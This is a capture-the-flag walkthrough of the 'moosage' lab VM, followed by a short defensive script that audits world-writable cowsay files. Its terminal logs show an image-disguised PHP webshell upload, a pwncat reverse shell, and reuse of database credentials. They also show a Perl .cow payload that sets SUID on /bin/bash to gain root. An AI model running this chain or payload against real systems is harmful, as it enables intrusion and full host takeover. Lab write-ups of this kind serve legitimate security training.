┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# nmap 192.168.56.22 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 05:27 EST
Nmap scan report for 192.168.56.22
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:AE:F2:FE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# dirsearch -u http://192.168.56.22
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/moosage/reports/http_192.168.56.22/_24-12-23_05-32-23.txt
Target: http://192.168.56.22/
[05:32:23] Starting:
[05:32:29] 301 - 185B - /blog -> http://192.168.56.22/blog/
[05:32:29] 200 - 10KB - /blog/
Task Completed
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# dirsearch -u http://192.168.56.22/blog/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/moosage/reports/http_192.168.56.22/_blog__24-12-23_05-33-02.txt
Target: http://192.168.56.22/
[05:33:02] Starting: blog/
[05:33:02] 301 - 185B - /blog/.git -> http://192.168.56.22/blog/.git/
[05:33:02] 403 - 571B - /blog/.git/
[05:33:02] 200 - 254B - /blog/.git/config
[05:33:02] 200 - 73B - /blog/.git/description
[05:33:02] 200 - 23B - /blog/.git/HEAD
[05:33:02] 403 - 571B - /blog/.git/hooks/
[05:33:02] 403 - 571B - /blog/.git/branches/
[05:33:02] 200 - 10KB - /blog/.git/index
[05:33:02] 403 - 571B - /blog/.git/info/
[05:33:02] 200 - 240B - /blog/.git/info/exclude
[05:33:02] 200 - 168B - /blog/.git/logs/HEAD
[05:33:02] 301 - 185B - /blog/.git/logs/refs -> http://192.168.56.22/blog/.git/logs/refs/
[05:33:02] 301 - 185B - /blog/.git/logs/refs/heads -> http://192.168.56.22/blog/.git/logs/refs/heads/
[05:33:02] 301 - 185B - /blog/.git/logs/refs/remotes -> http://192.168.56.22/blog/.git/logs/refs/remotes/
[05:33:02] 301 - 185B - /blog/.git/logs/refs/remotes/origin -> http://192.168.56.22/blog/.git/logs/refs/remotes/origin/
[05:33:02] 403 - 571B - /blog/.git/objects/
[05:33:02] 403 - 571B - /blog/.git/refs/
[05:33:02] 200 - 41B - /blog/.git/refs/heads/master
[05:33:02] 200 - 1KB - /blog/.git/packed-refs
[05:33:02] 200 - 168B - /blog/.git/logs/refs/heads/master
[05:33:02] 200 - 168B - /blog/.git/logs/refs/remotes/origin/HEAD
[05:33:02] 301 - 185B - /blog/.git/refs/heads -> http://192.168.56.22/blog/.git/refs/heads/
[05:33:02] 301 - 185B - /blog/.git/refs/remotes -> http://192.168.56.22/blog/.git/refs/remotes/
[05:33:02] 403 - 571B - /blog/.git/logs/
[05:33:02] 200 - 32B - /blog/.git/refs/remotes/origin/HEAD
[05:33:02] 301 - 185B - /blog/.git/refs/tags -> http://192.168.56.22/blog/.git/refs/tags/
[05:33:02] 301 - 185B - /blog/.git/refs/remotes/origin -> http://192.168.56.22/blog/.git/refs/remotes/origin/
[05:33:02] 200 - 171B - /blog/.gitignore
[05:33:02] 200 - 300B - /blog/.htaccess
[05:33:07] 200 - 37B - /blog/ajax.php
[05:33:07] 301 - 185B - /blog/app -> http://192.168.56.22/blog/app/
[05:33:07] 403 - 571B - /blog/app/
[05:33:09] 200 - 0B - /blog/common.php
[05:33:09] 200 - 1KB - /blog/config.ini
[05:33:10] 301 - 185B - /blog/data -> http://192.168.56.22/blog/data/
[05:33:10] 403 - 571B - /blog/data/
[05:33:10] 200 - 754B - /blog/docker-compose.yml
[05:33:10] 200 - 680B - /blog/Dockerfile
[05:33:11] 200 - 1KB - /blog/favicon.ico
[05:33:13] 200 - 34KB - /blog/LICENSE
[05:33:17] 200 - 8KB - /blog/README.md
[05:33:18] 200 - 25B - /blog/robots.txt
[05:33:19] 301 - 185B - /blog/static -> http://192.168.56.22/blog/static/
Task Completed
We found a /blog/ route.
Searching GitHub with the page source should turn up the application's source code.
The config.ini in the project folder contains the default password:
[admin]
force_login = true
nick = demo
pass = demo
[database]
db_connection = sqlite
;sqlite_db = data/sqlite.db
;[database]
;db_connection = mysql
;mysql_socket = /tmp/mysql.sock
;mysql_host = localhost
;mysql_port = 3306
;mysql_user = root
;mysql_pass = root
;db_name = blog
;[database]
;db_connection = postgres
;postgres_socket = /tmp/postgres.sock
;postgres_host = localhost
;postgres_port = 5432
;postgres_user = root
;postgres_pass = root
;db_name = blog
Log in to the admin panel with the default admin credentials.
Once logged in we can post messages, but there is no general file upload, only image upload.
Try uploading an image webshell.
PNG does not work; switching to GIF, the upload succeeds.
Visit the path http://192.168.56.22/blog/data/i/6d6N.php
Success.
Reverse shell:
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# pwncat-cs -lp 1234
[09:15:58] Welcome to pwncat 🐈! __main__.py:164
[09:16:07] received connection from 192.168.56.22:56926 bind.py:84
[09:16:07] 192.168.56.22:56926: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@moosage:/var/www/html/blog/data/i$ whoami
www-data
(remote) www-data@moosage:/var/www/html/blog/data/i$
Once inside, look at config.ini, which gives the MySQL credentials:
(remote) www-data@moosage:/var/www/html/blog$ cat config.ini
[database]
db_connection = sqlite
;sqlite_db = data/sqlite.db
;[database]
db_connection = mysql
mysql_socket = /run/mysqld/mysqld.sock
mysql_host = localhost
mysql_port = 3306
mysql_user = baca
mysql_pass = youareinsane
db_name = moosage
Gathering information from the database:
(remote) www-data@moosage:/var/www/html/blog$ mysql -ubaca -pyouareinsane
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 51
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| moosage |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [moosage]> show tables;
+-------------------+
| Tables_in_moosage |
+-------------------+
| images |
| posts |
+-------------------+
2 rows in set (0.000 sec)
MariaDB [moosage]> select * from posts;
+----+-------------+-------------+---------+---------+----------+---------+--------------+---------+---------------------+--------+
| id | text | plain_text | feeling | persons | location | content | content_type | privacy | datetime | status |
+----+-------------+-------------+---------+---------+----------+---------+--------------+---------+---------------------+--------+
| 1 | Super TEST! | Super TEST! | | | | | | public | 2021-04-22 14:30:01 | 1 |
+----+-------------+-------------+---------+---------+----------+---------+--------------+---------+---------------------+--------+
1 row in set (0.000 sec)
MariaDB [moosage]> select * from iages;
ERROR 1146 (42S02): Table 'moosage.iages' doesn't exist
MariaDB [moosage]> select * from images;
+----+-----------+-----------------+-----------------+------+----------------------------------+---------------------+--------+
| id | name | path | thumb | type | md5 | datetime | status |
+----+-----------+-----------------+-----------------+------+----------------------------------+---------------------+--------+
| 1 | a.png.php | data/i/1Qkz.php | data/t/1Qkz.php | php | 2e0d2d57db0657f87ecb595e102be2b5 | 2024-12-23 09:08:42 | 1 |
| 2 | a.png.php | NULL | NULL | php | e0e6d0223f0ee718cc9c2f6d9cb9dbe7 | 2024-12-23 09:11:31 | 0 |
| 3 | a.png.php | NULL | NULL | php | 072faae5bb7cf8b20677424021e215e2 | 2024-12-23 09:12:01 | 0 |
| 4 | a.gif.php | NULL | NULL | php | 4dec43f548b786e903cad2b5beed121a | 2024-12-23 09:12:34 | 0 |
| 5 | a.gif.php | NULL | NULL | php | 4dec43f548b786e903cad2b5beed121a | 2024-12-23 09:12:41 | 0 |
| 6 | a.gif.php | data/i/6d6N.php | data/t/6d6N.php | php | ccf96e50f5a98a3a50bb5e963e1af038 | 2024-12-23 09:13:29 | 1 |
+----+-----------+-----------------+-----------------+------+----------------------------------+---------------------+--------+
6 rows in set (0.000 sec)
Nothing in there looks exploitable.
Using the baca user's database credentials, we find they also work for switching to that account directly:
(remote) www-data@moosage:/var/www/html/blog$ su baca
Password:
baca@moosage:/var/www/html/blog$
baca@moosage:~$ sh flag.sh
-------------------------
PWNED HOST: moosage
PWNED DATE: Mon 23 Dec 2024 09:25:14 AM EST
WHOAMI: uid=1000(baca) gid=1000(baca) groups=1000(baca),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
FLAG: hmvmessageme
------------------------
First write a public key into the baca user's home directory:
baca@moosage:~$ mkdir .ssh
baca@moosage:~$ chmod 700 .ssh/
baca@moosage:~$ cd .ssh/
baca@moosage:~/.ssh$ nano authorized_keys
Then connect over SSH:
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# ssh -i /root/.ssh/id_rsa baca@192.168.56.22
The authenticity of host '192.168.56.22 (192.168.56.22)' can't be established.
ED25519 key fingerprint is SHA256:e00X2Lw0BXoFelHR9ZRP3JogiBvwujMOAvxKJutaAMk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.22' (ED25519) to the list of known hosts.
___________________________
< WELCOME TO MOOSAGE SYSTEM >
---------------------------
\
\
,__, | |
(oo)\| |___
(__)\| | )\_
| |_w | \
| | || *
Cower....
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 14:04:44 2021 from 192.168.1.58
baca@moosage:~$
The talking cow suggests that cowsay is invoked at SSH login.
cowsay ships many animals to choose from, but at every login it is the cow that speaks, so we only need to find the cow's configuration file:
baca@moosage:/usr/share/cowsay/cows$ find / -name cow* 2>/dev/null
/usr/share/cowsay/cows/cower.cow
baca@moosage:/usr/share/cowsay/cows$ ls -la
total 192
drwxr-xr-x 2 root root 4096 Apr 22 2021 .
drwxr-xr-x 3 root root 4096 Apr 22 2021 ..
-rw-rw-rw- 1 root root 115 Feb 3 2019 apt.cow
-rw-rw-rw- 1 root root 310 Aug 14 1999 bud-frogs.cow
-rw-rw-rw- 1 root root 123 Aug 14 1999 bunny.cow
-rw-rw-rw- 1 root root 1127 Feb 3 2019 calvin.cow
-rw-rw-rw- 1 root root 480 Aug 14 1999 cheese.cow
-rw-rw-rw- 1 root root 181 Feb 3 2019 cock.cow
-rw-rw-rw- 1 root root 230 Aug 14 1999 cower.cow
We can modify cower.cow and then log in over SSH to escalate privileges.
A .cow file is essentially a Perl script.
Modify the contents of cower.cow:
#!/usr/bin/perl
use strict;
use warnings;

# Set the SUID bit on /bin/bash
my $file        = "/bin/bash";
my $permissions = 04755;    # the leading 4 is the SUID bit

# Change the file's permissions
if (chmod $permissions, $file) {
    print "Successfully set SUID bit on $file.\n";
} else {
    die "Failed to set SUID bit on $file: $!\n";
}
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# ssh -i /root/.ssh/id_rsa baca@192.168.56.22
Successfully set SUID bit on /bin/bash.
___________________________
< WELCOME TO MOOSAGE SYSTEM >
---------------------------
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 23 10:02:42 2024 from 192.168.56.6
-bash-5.0$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash
-bash-5.0$ bash -p
bash-5.0#
bash-5.0# whoami
root
bash-5.0# sh flag.sh
-------------------------
PWNED HOST: moosage
PWNED DATE: Mon 23 Dec 2024 10:04:58 AM EST
WHOAMI: uid=1000(baca) gid=1000(baca) groups=1000(baca),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
FLAG: Keep trying.
------------------------
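The escalation above works only because the .cow files under /usr/share/cowsay/cows are world-writable (-rw-rw-rw-) and cowsay evaluates them as Perl in the context of whoever logs in. The script below is an added example, not part of the original writeup: it audits a cows directory for world-writable .cow files and resets them to 0644. It builds a constructed sample directory so it runs offline; the directory layout and file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the writeup): audit a cowsay "cows" directory.
# cowsay loads .cow files as Perl, so a world-writable .cow file lets any
# local user run code as every account that triggers cowsay at login.

# Print each world-writable regular .cow file directly under $1, one per line.
find_writable_cows() {
    find "$1" -maxdepth 1 -type f -name '*.cow' -perm -002 2>/dev/null | sort
}

# Reset every reported file to 0644 (ownership is left unchanged).
fix_writable_cows() {
    find_writable_cows "$1" | while IFS= read -r f; do
        chmod 0644 "$f" && printf 'fixed %s\n' "$f"
    done
}

# Constructed sample directory so the check runs offline: one sane file and
# one with the weak 0666 mode seen in the writeup's ls -la output.
make_sample_cows() {
    dir=$(mktemp -d)
    printf '$the_cow = <<EOC;\n  ^__^\nEOC\n' > "$dir/default.cow"
    cp "$dir/default.cow" "$dir/cower.cow"
    chmod 0644 "$dir/default.cow"
    chmod 0666 "$dir/cower.cow"
    printf '%s\n' "$dir"
}
```

On a real host, run `find_writable_cows /usr/share/cowsay/cows` as part of a permissions audit; any hit is a local privilege-escalation path if cowsay is wired into a login hook.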